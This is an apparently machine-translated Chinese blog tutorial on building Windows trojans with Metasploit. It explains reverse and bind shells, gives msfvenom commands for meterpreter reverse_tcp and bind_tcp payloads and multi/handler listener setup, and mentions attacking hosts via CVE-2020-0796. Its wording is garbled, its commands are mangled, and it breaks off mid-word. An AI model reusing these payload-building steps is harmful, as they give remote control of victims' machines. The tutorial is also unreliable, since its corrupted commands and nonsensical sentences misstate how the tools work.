msf生成木马,msf生成windows木马

  msf生成木马,msf生成windows木马

  有效载荷分类:

  我们来分为正向木马和反向木马。我们所知有限,请参考。

  反弹木马简介:

  反弹shell建立从目标主机到攻击主机的网络连接,并向命令行shell提供攻击负载。很明显,攻击者上传到目标主机后,弹性木马由目标主机运行,并与攻击者建立会话。因此,反弹木马会话很难被waf等安全设备拦截。

  特洛伊木马转发连接概述:

  绑定外壳攻击有效负载绑定到在目标主机上打开命令行外壳的侦听端口,攻击者可以连接到这些端口以获得外壳交互。很明显,rebound是木马,而bind shell是攻击者运行在自己的主机上对目标主机发起攻击并建立会话。

  有效载荷生成:

  使用msfvenom在msf中生成有效负载

  个人认为msf生成木马有四个要素:攻击主机类型(windows(Linux),木马类型(reverse_TCP) bindshell),监控主机,监控端口。当然,监视器APP必须是metepreter!

  并生成拦截反弹木马:

  反壳木马的原理是目标主机与攻击者建立会话连接,因此攻击者不会自行设置监听主机或端口。因此,在生成木马时,需要对主机和端口逐一进行监控。它还有一个小缺点,就是只能在固定主机上监控。格式如下。

  MSF venom-p windows/meter preter/reverse _ tcpl host=192 . 168 . 60 . 44 lport=4444-fexe-opayload . exe

  将生成的payload.exe上传到目标主机后,开始本地监控。

  做木马和木马工作是一回事,监控又是另一回事。首先,您必须选择本地监听主机和端口以匹配特洛伊木马设置。虽然有美景,但即使看到鳗鱼杯也看不到。

  msf使用漏洞利用/多重/处理程序

  MSFexploit(处理程序)setpayloadwindows/meter preter/reverse _ TCP

  MSFexploit(处理程序)设置lhost 10.0.0.217 MSF漏洞利用(处理程序)设置lport 4444 MSF漏洞利用(处理程序)漏洞利用

  点击木马,连接成功。

  并生成特洛伊木马来拦截bind shell:

  之前的cve2020-0796永远黑用的就是这种方法。

  个人认为bindshell不需要设置监听端口,因为攻击者会在本地启动到目标主机的会话连接。以便我们灵活运用。监听哪个主机正在攻击?但通常会被复合安全设备拦截。但是根据bind shell的原理,监听端口是必须设置的。

  MSF venom-p windows/x64/meter preter/bind _ tcpl port=4444-b x00 -i1-fpython

  运行exploit.py,攻击目标主机。

  python 3 exploi . py-IP 192 . 168 . 68 . 52

  开始聆听:

  要通过bind_tcp接收,需要设置接收端口。它需要与特洛伊木马保持一致。那么,如果多台主机向这个端口发送会话请求,该怎么办呢?您还必须选择要监听的目标主机。使用目标rhost

  use exploit/Multi/HandlerSetPayloadWindows/x64/meter preter/Bind _ TCP setport 888//监听端口

  设置rhost 192.168.142.129 //目标主机

  联

msf生成木马,msf生成windows木马